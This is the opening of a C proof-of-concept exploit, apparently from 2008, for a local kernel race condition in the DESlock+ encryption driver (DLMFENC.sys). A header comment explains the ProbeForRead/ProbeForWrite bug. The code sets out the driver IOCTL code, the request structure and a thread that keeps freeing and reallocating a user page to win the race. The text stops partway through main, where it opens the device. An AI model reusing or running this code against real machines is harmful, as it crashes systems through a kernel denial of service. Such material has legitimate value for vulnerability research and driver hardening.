/* deslock-probe-race.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* DESlock+ <= 3.2.7 local kernel race condition DoS POC
* by mu-b - Fri 22 Feb 2008
*
* - Tested on: DLMFENC.sys 1.0.0.28
*
* race conditions between calls to ProbeForRead/ProbeForWrite
* and pointer use.
*
* "Note that subsequent accesses by the driver to the user-mode
*   buffer must also be encapsulated within a try/except block;"
*  - http://msdn.microsoft.com/en-us/library/ms797108.aspx
*
* http://www.cctmark.gov.uk/CCTMAwards/DataEncryptionSystemsLtd/tabid/103/Default.aspx
* - I wonder what that says about CESG CCTM?
*
*    - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>

#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG  0xDEADBEEF

#define ARG_SIZE(a)   ((a-(sizeof (int)*2))/sizeof (void *))

struct ioctl_req {
  int flag;
  int req_num;
  void *arg[ARG_SIZE(0x20)];
};

void
hammer_thread (void *zpage)
{
  BOOL result;

  printf ("* [child] using page @0x%08X\n", zpage);

  while (1)
    {
      result = VirtualFree (zpage, 0, MEM_RELEASE);
      if (result == 0)
        {
          fprintf (stderr, "* [child] VirtualFree failed\n");
          exit (EXIT_FAILURE);
        }

      zpage = VirtualAlloc ((LPVOID) 0x41000000, 0x10000,
                             MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if (zpage == NULL)
        {
          fprintf (stderr, "* [child] VirtualAlloc failed\n");
          exit (EXIT_FAILURE);
        }
    }
}

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  HANDLE hFile, hThread;
  DWORD rlen, dThread, nTotal, nFail;
  LPVOID zpage;
  BOOL result;

  printf ("DESlock+ <= 3.2.7 local kernel race condition DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  fflush (stdout);
  hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,